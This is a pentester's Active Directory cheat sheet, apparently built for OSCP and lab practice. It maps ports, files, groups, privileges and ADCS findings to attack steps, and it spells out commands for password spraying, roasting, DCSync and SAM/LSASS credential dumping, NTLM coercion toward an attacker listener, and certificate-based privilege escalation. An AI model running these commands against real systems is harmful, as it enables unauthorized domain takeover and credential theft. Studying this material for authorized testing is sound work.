GTR - Got To Remember
Quick-reference mental model. Not a checklist - a set of instincts to build. Each entry answers: “what should this make me think?”
Version: 26.03.2026
When You See This…
Ports & Services
| You see… | Think… |
|---|---|
| 88 + 389 + 445 | Domain Controller. Run zbulim. Start with null/guest auth. |
| 5985 open | WinRM available. First credential you find, test it here. |
| 1433 (MSSQL) on a DC | Two attack surfaces. MSSQL can coerce NTLM hashes even without xp_cmdshell. |
| 1433 on a non-DC | Use -d . not --local-auth for MSSQL auth. Also check if SMB signing is off - relay is viable. |
| 80 on a DC | OSINT. Staff pages = username candidates. Feed to username-anarchy + AS-REP roast. |
| 80 + PHP + IIS | Unusual combo. Look for the app name - search "<appname> exploit" immediately. |
| SMB signing: not required | Responder is viable. Any coercion primitive (xp_dirtree, PrinterBug, PetitPotam) will give you a crackable hash or relayable auth. |
| No 88/389 (no DC ports) | Member server. Adjust tooling: use -d . or --local-auth. |
Shares & Files
| You see… | Think… |
|---|---|
Non-standard share (HR, Dev, IT, Backup, Reports, Shares) | Spider it immediately with spider_plus -o DOWNLOAD_FLAG=True. |
.xlsm / macro-enabled Office doc | olevba or open it and check VBA. Connection strings with credentials are common. |
.zip with a password | zip2john + john. |
.pfx file | pfx2john + john. Then openssl pkcs12 to extract cert + key. Use with evil-winrm -S -k -c. |
.xml file in a user’s folder | Read it. Azure AD Connect stores plaintext passwords in XML. |
azure.xml anywhere | Plaintext sync account credentials. High value. |
Groups.xml on SYSVOL or cached | GPP password. Decrypt with gpp-decrypt. Works even post-MS14-025 if the file wasn’t cleaned up. |
.reg file with "Password"=hex: | VNC encrypted password. Decrypt with vncpwd. |
Backup archive (.zip, .7z) in a web root | Download via HTTP directly. Check for hidden files with tree -a. grep -ri password everything. |
web.config, config.php, waptserver.ini | Connection strings. Always check these files on any web shell. |
$RECYCLE.BIN folder | Check it. Deleted files including config archives sometimes live here. |
Credentials & Users
| You see… | Think… |
|---|---|
| A list of real names (website, email) | username-anarchy → AS-REP roast the whole candidate list. One hit confirms the naming convention. |
| A password but no username | Enumerate users (RID brute if needed), then spray. Don’t dismiss the password. |
| Credentials that fail auth | Enumerate the real user list. Typos in AutoLogon/scripts are common. Spray the password against all users. |
Null Auth: True in nxc | Try --users, --rid-brute, --shares with both -u '' and -u 'guest'. |
| Guest auth on SMB but no null | Try --shares, spider_plus. Non-standard shares are the prize. |
| A new account gained | Re-enumerate: shares, BloodHound, certipy find -vulnerable, net user, whoami /priv. |
User description in --users output | Read every description. Passwords stored as notes are common. |
| Custom LDAP attribute on a user | Base64 decode it. Custom attributes like cascadeLegacyPwd are legacy password stores. |
| AutoLogon credentials in winPEAS | The password is real even if the username is wrong. Enumerate users and spray it. |
| PS history file | cat $Env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. Credentials in one-liners are common. |
Group Memberships (run net user <you> after every shell)
| You are in… | You can do… |
|---|---|
Account Operators | Add yourself to most groups (not DA directly, but Exchange, etc.). Check BloodHound for what those groups can reach. |
Backup Operators | reg save hklm\sam + reg save hklm\system → secretsdump.py LOCAL → local admin NT hash. |
Server Operators | Hijack any service binary path with sc.exe config <svc> binPath=... → restart → SYSTEM shell. |
LAPS_Readers | nxc ldap -M laps → plaintext local admin password for every LAPS-managed machine. |
AD Recycle Bin | Get-ADObject -includeDeletedObjects -property * → recover deleted user attributes including passwords. |
Group Policy Creator Owners | Create + link a GPO to a target OU → SharpGPOAbuse to add a scheduled task → SYSTEM. |
Exchange Windows Permissions | WriteDACL on the domain root → grant yourself DCSync → secretsdump.py. |
DnsAdmins | Load a malicious DLL into the DNS service (runs as SYSTEM). |
Privileges (run whoami /priv after every shell)
| You have… | You can do… |
|---|---|
SeBackupPrivilege | Read any file. Dump SAM + SYSTEM hives. Copy NTDS.dit via shadow copy. |
SeRestorePrivilege | Write any file. Replace binaries. |
SeImpersonatePrivilege | Potato attacks: GodPotato, PrintSpoofer → SYSTEM. Common on service accounts. |
SeLoadDriverPrivilege | Load a kernel driver → SYSTEM (Capcom.sys technique). |
SeDebugPrivilege | Dump LSASS memory → extract credentials. |
ADCS (run certipy find -vulnerable with any domain credential)
| You find… | Attack |
|---|---|
| ESC1 | certipy req -upn administrator@domain -template <vuln_template> → cert → certipy auth → NT hash. |
| ESC7 | Add yourself as Officer via certipy ca -add-officer → request SubCA cert for admin → self-approve → certipy auth → NT hash. |
| ESC9 | Template has no security extension - UPN trusted at face value. Out of OSCP scope. |
ManageCA on any account | ESC7 is likely. Check for Officer escalation path. |
Stuck? Try These in Order
-
Stuck with no creds at all
- Null session:
nxc smb <ip> -u '' -p ''andnxc smb <ip> -u guest -p '' - RID brute:
nxc smb <ip> -u guest -p '' --rid-brute - AS-REP roast with username list:
nxc ldap <ip> -u users.txt -p '' --asreproast - Username-as-password spray after getting a user list
- Null session:
-
Stuck with low-priv creds
- BloodHound first. Mark owned. Run “Shortest Paths from Owned Objects to Tier Zero.”
certipy find -vulnerable- ADCS misconfigs are everywhere and often overlooked- Re-enumerate shares with the new account - access changes per credential
- Check user descriptions:
nxc smb -u <user> -p <pass> --users - Check PS history, AutoLogon, SYSVOL scripts for credentials
-
Stuck on a shell with no obvious privesc
net user <you>- group membershipswhoami /priv- token privileges- winPEAS or PowerUp
Invoke-AllChecks - Check SQL Server error logs:
C:\<SQLpath>\MSSQL\Log\ERRORLOG* - Check Recycle Bin:
gci -force 'C:\$RECYCLE.BIN' - Check web app config files:
config.php,web.config,appsettings.json,*.ini
-
Stuck and nothing is working
- Reset the box - service may be down (seen with MSSQL on Escape)
- Re-read every file you downloaded. One detail was probably missed.
- BloodHound: mark every account you own and rerun paths.
Quick Credential Validation Flow
Got a credential? Test in this order:
nxc smb <ip> -u <user> -p <pass> # Does it auth? Is it local admin (Pwn3d!)?
nxc winrm <ip> -u <user> -p <pass> # Shell access?
nxc ldap <ip> -u <user> -p <pass> # Domain user? Useful for BloodHound/certipy
nxc mssql <ip> -u <user> -p <pass> # DB access? (or -d . on non-DC)
Got an NT hash? Same flow but replace -p <pass> with -H <hash>.
Tool Shortcuts
# Full recon in one command
zbulim <ip>
# BloodHound collection from Kali
rusthound-ce -i <dc-ip> -d <domain> -u <user> -p <pass> -c All -z
# AS-REP roast (also validates usernames)
nxc ldap <dc-ip> -u users.txt -p '' --asreproast out.txt
# Kerberoast
nxc ldap <dc-ip> -u <user> -p <pass> --kerberoasting out.txt
# LAPS password
nxc ldap <dc-ip> -u <user> -p <pass> -M laps
# MSSQL coercion (Responder must be running)
nxc mssql <ip> -u <user> -p <pass> -M mssql_coerce -o LISTENER=<tun0-ip>
# Find ADCS vulns
certipy find -vulnerable -u <user>@<domain> -p <pass> -dc-ip <ip> -stdout
# DCSync
secretsdump.py <domain>/<user>:<pass>@<dc-ip>
# Decrypt GPP password
gpp-decrypt <cpassword>
# SAM dump from downloaded hives
secretsdump.py -sam sam -system system LOCALThings That Are Easy to Forget
- Sync the clock before any Kerberos operation:
sudo ntpdate -s <dc-ip> nxc smbreturns(Pwn3d!)for local admin. No(Pwn3d!)= authenticated but not admin.secretsdumpRemoteOperations failedis normal - DRSUAPI fallback still works.pfx2johnoutput may haveb'...'wrapper in Python3 - strip it before feeding to john.tree -ashows hidden files (dotfiles). Always use it on downloaded archives.- After every new credential: re-run shares, BloodHound, certipy.
- MSSQL on non-DC:
-d .not--local-auth. - SMB signing off = relay viable. SMB signing on = only capture (Responder), not relay.